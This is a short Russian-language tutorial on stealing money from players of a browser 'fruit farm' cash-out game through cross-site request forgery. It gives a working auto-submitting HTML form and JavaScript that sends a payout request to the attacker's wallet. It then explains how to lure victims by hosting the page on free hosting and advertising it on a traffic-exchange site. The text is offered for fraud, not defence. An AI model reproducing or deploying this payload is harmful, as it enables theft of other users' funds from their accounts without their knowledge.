Как взломать Экономическую игру с выводом денег FF (fruit farm)
Всем привет и сегодня я покажу как очень просто можно обмануть ферму путем ее некоторой уязвимости
CSRF (Cross-Site Request Forgery) – атака, позволяющая хакеру выполнить на целевом сайте различные действия от имени других, зарегистрированных посетителей.
Абсолютно все движки игр подвержены этой уязвимости! Благодаря ей можно сделать в чужом аккаунте всё что угодно, но самое привлекательное это списать чужие средства на свой кошелек.
Делается это просто, первым делом подготавливаем форму заказа выплаты.
<form action = "http://имя_вашего_сайта/account/payment" method = "post" >
<input type = "text" name= "purse" value = "P000000">
<input type = "text" name= "sum" value = "50">
<input type = "text" name= "val_type" value = "RUB">
<input type="submit" id="myButton" onclick="myFunc()" >
</form>
Далее под ней вставляем javascript код который заставит браузер нажать на кнопку формы.
<script>
setTimeout(function() {document.getElementById("myButton").click();},1);
</script>
Все почти готово, теперь самое главное нам нужно как то заманить свою жертву, я предлагаю
скачать любой скрипт с нашего сайта и установить на бесплатный хостинг ( к примеру на timeweb.ru дают 10 дней бесплатного хостинга) далее
идем к примеру серфинг сайтов даем задание на наш сайт, указываем ссылку на наш заранее установленный на бесплатный хостинг сайт и после того как статус нашего задания будет доступен для исполнения, мы можем заливать наш скрипт в любом файле на вашем сайте и дело в шляпе
после перехода человека по вашей ссылке и нажатии на сайте подтверждения серфинга, скрипт автоматически сделает вывод на ваш кошелек указанный в скрипте. Вот и все спасибо за внимание!